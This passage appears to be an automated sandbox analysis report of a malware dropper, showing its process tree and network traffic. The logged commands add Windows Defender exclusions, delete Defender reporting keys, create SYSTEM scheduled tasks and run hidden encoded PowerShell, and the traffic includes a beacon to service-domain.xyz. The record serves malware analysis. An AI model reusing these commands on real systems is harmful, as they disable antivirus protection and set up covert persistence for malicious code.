                                        • System Location Discovery: System Language Discovery
                                        PID:4580
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YSrBLfWUtIHnuviW /t REG_DWORD /d 0 /reg:32
                                        3⤵
                                          PID:5080
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YSrBLfWUtIHnuviW /t REG_DWORD /d 0 /reg:64
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1056
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "gEpQjAwXw" /SC once /ST 11:15:43 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2036
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn "gEpQjAwXw"
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4736
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /DELETE /F /TN "gEpQjAwXw"
                                        2⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:836
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "MFUxwpyluZmBswWip" /SC once /ST 05:46:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\gKfVXar.exe\" 18 /site_id 525403 /S" /V1 /F
                                        2⤵
                                        • Drops file in Windows directory
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:400
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /run /I /tn "MFUxwpyluZmBswWip"
                                        2⤵
                                          PID:4368
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                        1⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3120
                                        • C:\Windows\system32\gpupdate.exe
                                          "C:\Windows\system32\gpupdate.exe" /force
                                          2⤵
                                            PID:2528
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                          1⤵
                                            PID:1952
                                          • C:\Windows\system32\gpscript.exe
                                            gpscript.exe /RefreshSystemParam
                                            1⤵
                                              PID:3900
                                            • C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\gKfVXar.exe
                                              C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\gKfVXar.exe 18 /site_id 525403 /S
                                              1⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • Drops Chrome extension
                                              • Drops desktop.ini file(s)
                                              • Drops file in System32 directory
                                              • Drops file in Program Files directory
                                              • System Location Discovery: System Language Discovery
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2596
                                              • C:\Windows\SysWOW64\schtasks.exe
                                                schtasks /DELETE /F /TN "bKwcWZekAnYWEgmozo"
                                                2⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:1968
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                2⤵
                                                  PID:1640
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                    3⤵
                                                      PID:3352
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                    2⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2800
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                      3⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4152
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZUXSmeDRU\wwmBpS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SEVCueFJyRflUhU" /V1 /F
                                                    2⤵
                                                    • Drops file in Windows directory
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1668
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /CREATE /TN "SEVCueFJyRflUhU2" /F /xml "C:\Program Files (x86)\ZUXSmeDRU\EiJiwro.xml" /RU "SYSTEM"
                                                    2⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:2832
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /END /TN "SEVCueFJyRflUhU"
                                                    2⤵
                                                      PID:1472
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /DELETE /F /TN "SEVCueFJyRflUhU"
                                                      2⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:116
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "iJzencGmrLwIJF" /F /xml "C:\Program Files (x86)\UBqYudvSNocU2\cMEXQfR.xml" /RU "SYSTEM"
                                                      2⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:4200
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "qYXqheuptEbIX2" /F /xml "C:\ProgramData\hrOORTLiECQfZJVB\jJxnkyn.xml" /RU "SYSTEM"
                                                      2⤵
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:4976
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "JDYpgkNAOwNKhospY2" /F /xml "C:\Program Files (x86)\xonCRuklPFipnPeqKpR\lYMkSqB.xml" /RU "SYSTEM"
                                                      2⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:2280
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "hPTErtfTjvBJRSQKVfY2" /F /xml "C:\Program Files (x86)\oXjeNNLqKAotC\nAJnCyw.xml" /RU "SYSTEM"
                                                      2⤵
                                                      • System Location Discovery: System Language Discovery
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:1012
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /CREATE /TN "NGWtXtGwgKKYsphzV" /SC once /ST 20:08:50 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YSrBLfWUtIHnuviW\bCCdSLSI\gMMmVQX.dll\",#1 /site_id 525403" /V1 /F
                                                      2⤵
                                                      • Drops file in Windows directory
                                                      • System Location Discovery: System Language Discovery
                                                      • Scheduled Task/Job: Scheduled Task
                                                      PID:1724
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /run /I /tn "NGWtXtGwgKKYsphzV"
                                                      2⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:2860
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                      2⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3552
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3164
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                      2⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3176
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                        3⤵
                                                          PID:368
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /DELETE /F /TN "MFUxwpyluZmBswWip"
                                                        2⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:2308
                                                    • C:\Windows\system32\rundll32.EXE
                                                      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YSrBLfWUtIHnuviW\bCCdSLSI\gMMmVQX.dll",#1 /site_id 525403
                                                      1⤵
                                                        PID:3300
                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YSrBLfWUtIHnuviW\bCCdSLSI\gMMmVQX.dll",#1 /site_id 525403
                                                          2⤵
                                                          • Blocklisted process makes network request
                                                          • Checks BIOS information in registry
                                                          • Loads dropped DLL
                                                          • Enumerates system info in registry
                                                          • Modifies data under HKEY_USERS
                                                          PID:2400
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /DELETE /F /TN "NGWtXtGwgKKYsphzV"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:512

                                                      Network

                                                      • flag-us
                                                        DNS
                                                        232.168.11.51.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        232.168.11.51.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                      • flag-us
                                                        DNS
                                                        69.209.201.84.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        69.209.201.84.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                      • flag-us
                                                        DNS
                                                        95.221.229.192.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        95.221.229.192.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                      • flag-us
                                                        DNS
                                                        17.160.190.20.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        17.160.190.20.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                      • flag-us
                                                        DNS
                                                        50.23.12.20.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        50.23.12.20.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                      • flag-us
                                                        DNS
                                                        198.187.3.20.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        198.187.3.20.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                      • flag-us
                                                        DNS
                                                        27.117.19.2.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        27.117.19.2.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                        27.117.19.2.in-addr.arpa
                                                        IN PTR
                                                        a2-19-117-27deploystaticakamaitechnologiescom
                                                      • flag-us
                                                        DNS
                                                        83.210.23.2.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        83.210.23.2.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                        83.210.23.2.in-addr.arpa
                                                        IN PTR
                                                        a2-23-210-83deploystaticakamaitechnologiescom
                                                      • flag-us
                                                        DNS
                                                        103.209.201.84.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        103.209.201.84.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                      • flag-us
                                                        DNS
                                                        22.236.111.52.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        22.236.111.52.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                      • flag-us
                                                        DNS
                                                        service-domain.xyz
                                                        gKfVXar.exe
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        service-domain.xyz
                                                        IN A
                                                        Response
                                                        service-domain.xyz
                                                        IN A
                                                        54.210.117.250
                                                      • flag-us
                                                        GET
                                                        https://service-domain.xyz/google_ifi_ico.png?rnd=Ye3Ylk0NL0Ikf4jkg1IJ_GJSB9TJSB5GISB7UJSB2RJSB9TJSB2JJSB9RJSB0GISB7AMSB3
                                                        gKfVXar.exe
                                                        Remote address:
                                                        54.210.117.250:443
                                                        Request
                                                        GET /google_ifi_ico.png?rnd=Ye3Ylk0NL0Ikf4jkg1IJ_GJSB9TJSB5GISB7UJSB2RJSB9TJSB2JJSB9RJSB0GISB7AMSB3 HTTP/1.1
                                                        Host: service-domain.xyz
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        Response
                                                        HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Mon, 11 Nov 2024 21:43:25 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 95
                                                        Connection: keep-alive
                                                        Access-Control-Allow-Origin: *
                                                        Cache-control: no-cache="set-cookie"
                                                        Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
                                                        Set-Cookie: AWSELBCORS=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200;SECURE;SAMESITE=None
                                                      • flag-us
                                                        DNS
                                                        r10.o.lencr.org
                                                        gKfVXar.exe
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        r10.o.lencr.org
                                                        IN A
                                                        Response
                                                        r10.o.lencr.org
                                                        IN CNAME
                                                        o.lencr.edgesuite.net
                                                        o.lencr.edgesuite.net
                                                        IN CNAME
                                                        a1887.dscq.akamai.net
                                                        a1887.dscq.akamai.net
                                                        IN A
                                                        2.23.210.82
                                                        a1887.dscq.akamai.net
                                                        IN A
                                                        2.23.210.75
                                                      • flag-gb
                                                        GET
                                                        http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgQ4DAJlzABIp9rEE8P1Q1t%2FYw%3D%3D
                                                        gKfVXar.exe
                                                        Remote address:
                                                        2.23.210.82:80
                                                        Request
                                                        GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgQ4DAJlzABIp9rEE8P1Q1t%2FYw%3D%3D HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        User-Agent: Microsoft-CryptoAPI/10.0
                                                        Host: r10.o.lencr.org
                                                        Response
                                                        HTTP/1.1 200 OK
                                                        Server: nginx
                                                        Content-Type: application/ocsp-response
                                                        Content-Length: 504
                                                        ETag: "68236191887CE6DB999A27713B3C0DCFDA50BEC9927C809561DA1E2C4ADE4614"
                                                        Last-Modified: Sat, 09 Nov 2024 23:59:00 UTC
                                                        Cache-Control: public, no-transform, must-revalidate, max-age=15518
                                                        Expires: Tue, 12 Nov 2024 02:02:02 GMT
                                                        Date: Mon, 11 Nov 2024 21:43:24 GMT
                                                        Connection: keep-alive
                                                      • flag-us
                                                        DNS
                                                        250.117.210.54.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        250.117.210.54.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                        250.117.210.54.in-addr.arpa
                                                        IN PTR
                                                        ec2-54-210-117-250 compute-1 amazonawscom
                                                      • flag-us
                                                        DNS
                                                        69.194.219.23.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        69.194.219.23.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                        69.194.219.23.in-addr.arpa
                                                        IN PTR
                                                        a23-219-194-69deploystaticakamaitechnologiescom
                                                      • flag-us
                                                        DNS
                                                        82.210.23.2.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        82.210.23.2.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                        82.210.23.2.in-addr.arpa
                                                        IN PTR
                                                        a2-23-210-82deploystaticakamaitechnologiescom
                                                      • flag-us
                                                        DNS
                                                        addons.mozilla.org
                                                        gKfVXar.exe
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        addons.mozilla.org
                                                        IN A
                                                        Response
                                                        addons.mozilla.org
                                                        IN A
                                                        151.101.129.91
                                                        addons.mozilla.org
                                                        IN A
                                                        151.101.65.91
                                                        addons.mozilla.org
                                                        IN A
                                                        151.101.1.91
                                                        addons.mozilla.org
                                                        IN A
                                                        151.101.193.91
                                                      • flag-us
                                                        GET
                                                        http://addons.mozilla.org/firefox/downloads/latest/find-it-pro?RnUfkyueus
                                                        gKfVXar.exe
                                                        Remote address:
                                                        151.101.129.91:80
                                                        Request
                                                        GET /firefox/downloads/latest/find-it-pro?RnUfkyueus HTTP/1.1
                                                        Host: addons.mozilla.org
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        Response
                                                        HTTP/1.1 301 Moved Permanently
                                                        Connection: close
                                                        Content-Length: 0
                                                        Server: Varnish
                                                        Retry-After: 0
                                                        Location: https://addons.mozilla.org/firefox/downloads/latest/find-it-pro?RnUfkyueus
                                                        Accept-Ranges: bytes
                                                        Date: Mon, 11 Nov 2024 21:43:25 GMT
                                                        Via: 1.1 varnish
                                                        X-Served-By: cache-lon420121-LON
                                                        X-Cache: HIT
                                                        X-Cache-Hits: 0
                                                      • flag-us
                                                        GET
                                                        https://addons.mozilla.org/firefox/downloads/latest/find-it-pro?RnUfkyueus
                                                        gKfVXar.exe
                                                        Remote address:
                                                        151.101.129.91:443
                                                        Request
                                                        GET /firefox/downloads/latest/find-it-pro?RnUfkyueus HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        Host: addons.mozilla.org
                                                        Response
                                                        HTTP/1.1 301 Moved Permanently
                                                        Connection: keep-alive
                                                        Content-Length: 0
                                                        Server: openresty
                                                        Content-Type: text/html; charset=utf-8
                                                        Location: /firefox/downloads/latest/find-it-pro/?RnUfkyueus
                                                        Content-Security-Policy: object-src 'none'; font-src 'self' https://addons.mozilla.org/static-server/; img-src 'self' blob: data: https://addons.mozilla.org/static-server/ https://addons.mozilla.org/user-media/ https://*.google-analytics.com https://*.googletagmanager.com; child-src https://www.recaptcha.net/recaptcha/; form-action 'self'; media-src https://videos.cdn.mozilla.net; script-src https://*.google-analytics.com https://*.googletagmanager.com https://www.recaptcha.net/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://addons.mozilla.org/static-server/; default-src 'none'; connect-src 'self' https://*.google-analytics.com https://*.analytics.google.com https://*.googletagmanager.com; style-src 'unsafe-inline' https://addons.mozilla.org/static-server/; frame-src https://www.recaptcha.net/recaptcha/; report-uri /__cspreport__
                                                        X-Frame-Options: DENY
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-Content-Type-Options: nosniff
                                                        Referrer-Policy: same-origin
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cache-Control: s-maxage=0
                                                        Via: 1.1 google, 1.1 varnish, 1.1 varnish
                                                        Accept-Ranges: bytes
                                                        Age: 0
                                                        Date: Mon, 11 Nov 2024 21:43:25 GMT
                                                        X-Served-By: cache-bfi-kbfi7400022-BFI, cache-lcy-eglc8600091-LCY
                                                        X-Cache: MISS, MISS
                                                        X-Cache-Hits: 0, 0
                                                        X-Timer: S1731361406.557284,VS0,VE154
                                                      • flag-us
                                                        GET
                                                        https://addons.mozilla.org/firefox/downloads/latest/find-it-pro/?RnUfkyueus
                                                        gKfVXar.exe
                                                        Remote address:
                                                        151.101.129.91:443
                                                        Request
                                                        GET /firefox/downloads/latest/find-it-pro/?RnUfkyueus HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        Host: addons.mozilla.org
                                                        Response
                                                        HTTP/1.1 404 Not Found
                                                        Connection: keep-alive
                                                        Content-Length: 13044
                                                        Server: openresty
                                                        Content-Type: text/html; charset=utf-8
                                                        X-AMO-Request-ID: 478ed0ab03e54cbcbb822152a48d73e1
                                                        ETag: "0bd6dcc9cb2f5113ed49194ea6889980"
                                                        Content-Security-Policy: media-src https://videos.cdn.mozilla.net; default-src 'none'; font-src 'self' https://addons.mozilla.org/static-server/; connect-src 'self' https://*.google-analytics.com https://*.analytics.google.com https://*.googletagmanager.com; frame-src https://www.recaptcha.net/recaptcha/; child-src https://www.recaptcha.net/recaptcha/; form-action 'self'; script-src https://*.google-analytics.com https://*.googletagmanager.com https://www.recaptcha.net/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://addons.mozilla.org/static-server/; object-src 'none'; style-src 'unsafe-inline' https://addons.mozilla.org/static-server/; img-src 'self' blob: data: https://addons.mozilla.org/static-server/ https://addons.mozilla.org/user-media/ https://*.google-analytics.com https://*.googletagmanager.com; report-uri /__cspreport__
                                                        X-Frame-Options: DENY
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-Content-Type-Options: nosniff
                                                        Referrer-Policy: same-origin
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cache-Control: s-maxage=0
                                                        Via: 1.1 google, 1.1 varnish, 1.1 varnish
                                                        Accept-Ranges: bytes
                                                        Age: 0
                                                        Date: Mon, 11 Nov 2024 21:43:25 GMT
                                                        X-Served-By: cache-bfi-krnt7300066-BFI, cache-lcy-eglc8600091-LCY
                                                        X-Cache: MISS, MISS
                                                        X-Cache-Hits: 0, 0
                                                        X-Timer: S1731361406.737438,VS0,VE160
                                                        Vary: Accept-Encoding
                                                      • flag-us
                                                        GET
                                                        https://addons.mozilla.org/firefox/downloads/latest/find-it-pro?XpnNrrxQfG
                                                        gKfVXar.exe
                                                        Remote address:
                                                        151.101.129.91:443
                                                        Request
                                                        GET /firefox/downloads/latest/find-it-pro?XpnNrrxQfG HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        Host: addons.mozilla.org
                                                        Response
                                                        HTTP/1.1 301 Moved Permanently
                                                        Connection: keep-alive
                                                        Content-Length: 0
                                                        Server: openresty
                                                        Content-Type: text/html; charset=utf-8
                                                        Location: /firefox/downloads/latest/find-it-pro/?XpnNrrxQfG
                                                        Content-Security-Policy: child-src https://www.recaptcha.net/recaptcha/; frame-src https://www.recaptcha.net/recaptcha/; script-src https://*.google-analytics.com https://*.googletagmanager.com https://www.recaptcha.net/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://addons.mozilla.org/static-server/; img-src 'self' blob: data: https://addons.mozilla.org/static-server/ https://addons.mozilla.org/user-media/ https://*.google-analytics.com https://*.googletagmanager.com; form-action 'self'; font-src 'self' https://addons.mozilla.org/static-server/; default-src 'none'; connect-src 'self' https://*.google-analytics.com https://*.analytics.google.com https://*.googletagmanager.com; media-src https://videos.cdn.mozilla.net; object-src 'none'; style-src 'unsafe-inline' https://addons.mozilla.org/static-server/; report-uri /__cspreport__
                                                        X-Frame-Options: DENY
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-Content-Type-Options: nosniff
                                                        Referrer-Policy: same-origin
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cache-Control: s-maxage=0
                                                        Via: 1.1 google, 1.1 varnish, 1.1 varnish
                                                        Accept-Ranges: bytes
                                                        Age: 0
                                                        Date: Mon, 11 Nov 2024 21:43:26 GMT
                                                        X-Served-By: cache-bfi-kbfi7400114-BFI, cache-lcy-eglc8600091-LCY
                                                        X-Cache: MISS, MISS
                                                        X-Cache-Hits: 0, 0
                                                        X-Timer: S1731361406.980284,VS0,VE268
                                                      • flag-us
                                                        GET
                                                        https://addons.mozilla.org/firefox/downloads/latest/find-it-pro/?XpnNrrxQfG
                                                        gKfVXar.exe
                                                        Remote address:
                                                        151.101.129.91:443
                                                        Request
                                                        GET /firefox/downloads/latest/find-it-pro/?XpnNrrxQfG HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        Host: addons.mozilla.org
                                                        Response
                                                        HTTP/1.1 404 Not Found
                                                        Connection: keep-alive
                                                        Content-Length: 13044
                                                        Server: openresty
                                                        Content-Type: text/html; charset=utf-8
                                                        X-AMO-Request-ID: 42f3620e734d4a3bba2c532f877c9c36
                                                        ETag: "87f1058618ca493d7b45efad5a22ecf0"
                                                        Content-Security-Policy: style-src 'unsafe-inline' https://addons.mozilla.org/static-server/; connect-src 'self' https://*.google-analytics.com https://*.analytics.google.com https://*.googletagmanager.com; script-src https://*.google-analytics.com https://*.googletagmanager.com https://www.recaptcha.net/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://addons.mozilla.org/static-server/; form-action 'self'; child-src https://www.recaptcha.net/recaptcha/; object-src 'none'; font-src 'self' https://addons.mozilla.org/static-server/; media-src https://videos.cdn.mozilla.net; img-src 'self' blob: data: https://addons.mozilla.org/static-server/ https://addons.mozilla.org/user-media/ https://*.google-analytics.com https://*.googletagmanager.com; frame-src https://www.recaptcha.net/recaptcha/; default-src 'none'; report-uri /__cspreport__
                                                        X-Frame-Options: DENY
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-Content-Type-Options: nosniff
                                                        Referrer-Policy: same-origin
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Cache-Control: s-maxage=0
                                                        Via: 1.1 google, 1.1 varnish, 1.1 varnish
                                                        Accept-Ranges: bytes
                                                        Age: 0
                                                        Date: Mon, 11 Nov 2024 21:43:26 GMT
                                                        X-Served-By: cache-bfi-kbfi7400097-BFI, cache-lcy-eglc8600091-LCY
                                                        X-Cache: MISS, MISS
                                                        X-Cache-Hits: 0, 0
                                                        X-Timer: S1731361406.275164,VS0,VE151
                                                        Vary: Accept-Encoding
                                                      • flag-us
                                                        GET
                                                        http://addons.mozilla.org/firefox/downloads/latest/find-it-pro?XpnNrrxQfG
                                                        gKfVXar.exe
                                                        Remote address:
                                                        151.101.129.91:80
                                                        Request
                                                        GET /firefox/downloads/latest/find-it-pro?XpnNrrxQfG HTTP/1.1
                                                        Host: addons.mozilla.org
                                                        Connection: Keep-Alive
                                                        Cache-Control: no-cache
                                                        Response
                                                        HTTP/1.1 301 Moved Permanently
                                                        Connection: close
                                                        Content-Length: 0
                                                        Server: Varnish
                                                        Retry-After: 0
                                                        Location: https://addons.mozilla.org/firefox/downloads/latest/find-it-pro?XpnNrrxQfG
                                                        Accept-Ranges: bytes
                                                        Date: Mon, 11 Nov 2024 21:43:25 GMT
                                                        Via: 1.1 varnish
                                                        X-Served-By: cache-lon420103-LON
                                                        X-Cache: HIT
                                                        X-Cache-Hits: 0
                                                      • flag-us
                                                        DNS
                                                        91.129.101.151.in-addr.arpa
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        91.129.101.151.in-addr.arpa
                                                        IN PTR
                                                        Response
                                                      • flag-us
                                                        DNS
                                                        c.pki.goog
                                                        gKfVXar.exe
                                                        Remote address:
                                                        8.8.8.8:53
                                                        Request
                                                        c.pki.goog
                                                        IN A
                                                        Response
                                                        c.pki.goog
                                                        IN CNAME
                                                        pki-goog.l.google.com
                                                        pki-goog.l.google.com
                                                        IN A
                                                        142.250.187.227
                                                      • flag-gb
                                                        GET
                                                        http://c.pki.goog/r/r1.crl
                                                        gKfVXar.exe
                                                        Remote address:
                                                        142.250.187.227:80
                                                        Request
                                                        GET /r/r1.crl HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Accept: */*
                                                        User-Agent: Microsoft-CryptoAPI/10.0
                                                        Host: c.pki.goog
                                                        Response
                                                        HTTP/1.1 200 OK
                                                        Accept-Ranges: bytes
                                                        Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
                                                        Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
                                                        Content-Length: 854
                                                        X-Content-Type-Options: nosniff
                                                        Server: sffe
                                                        X-XSS-Protection: 0
                                                        Date: Mon, 11 Nov 2024 21:25:46 GMT
                                                        Expires: Mon, 11 Nov 2024 22:15:46 GMT
                                                        Cache-Control: public, max-age=3000
                                                        Age: 1060
                                                        Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                        Content-Type: application/pkix-crl
